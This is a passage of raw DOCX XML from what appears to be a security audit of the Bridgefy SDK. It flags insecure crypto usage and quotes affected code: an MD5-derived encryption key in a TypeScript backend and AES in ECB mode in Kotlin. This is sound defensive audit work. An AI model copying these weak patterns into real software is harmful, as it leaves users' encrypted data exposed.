          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>identified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>regularly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>insecure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>usage.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>This issue can be confirmed by looking at the following files:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="582" w:lineRule="exact" w:before="32"/>
        <w:ind w:right="4309"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Usage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>insecure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>crypto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>functions Affected File:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="221" w:lineRule="exact" w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-sdk-backend/src/infra/crypto-service.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="1001" w:right="6324" w:hanging="297"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>_getEncryptionKey({ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apiKey,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="917" w:right="7511" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>licenseId, version,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="1001" w:right="6049" w:hanging="297"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IGetEncryptKey):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>crypto</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1440" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.createHash(IEnumAlgorithm.MD5)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1440" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.update(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>`${apiKey}:${licenseId}:${version}`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1440" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.digest(IEnumEncoding.HEX);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="705" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>File:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-sdk-android/bridgefy-crypto/src/main/java/me/bridgefy/crypto/utils/AES256.kt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="17"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487614976">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>145486</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="77" name="Graphic 77"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="77" name="Graphic 77"/>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1.455645pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15701504;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape62" coordorigin="1440,229" coordsize="2880,0" path="m1440,229l4320,229e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="105"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>103</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId171">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://www.techtarget.com/searchsecurity/definition/MD5</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>104</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId172">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://vulncat.fortify.com/en/detail?id=desc.semantic.cpp.weak_encryption...of_operation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>105</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="35"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId173">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://en.wikipedia.org/wiki/Cryptographically-secure_pseudorandom_number_generator</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="13"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="705" w:right="6728" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>@SuppressLint("NewApi") </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>private object </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>AES256 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="31"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="1100" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>private </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>const </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>val </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ALGORITHM = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"AES"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1016" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>private </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>val </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ALGORITHM_STR = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"AES/ECB/PKCS7Padding"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="63"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1016" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>@SuppressLint("GetInstance")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1016" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>private fun </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(opmode: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, secretKey: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>): Cipher </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="705" w:right="475" w:firstLine="735"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(secretKey.length</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>!=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>32)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>throw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>RuntimeException("SecretKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
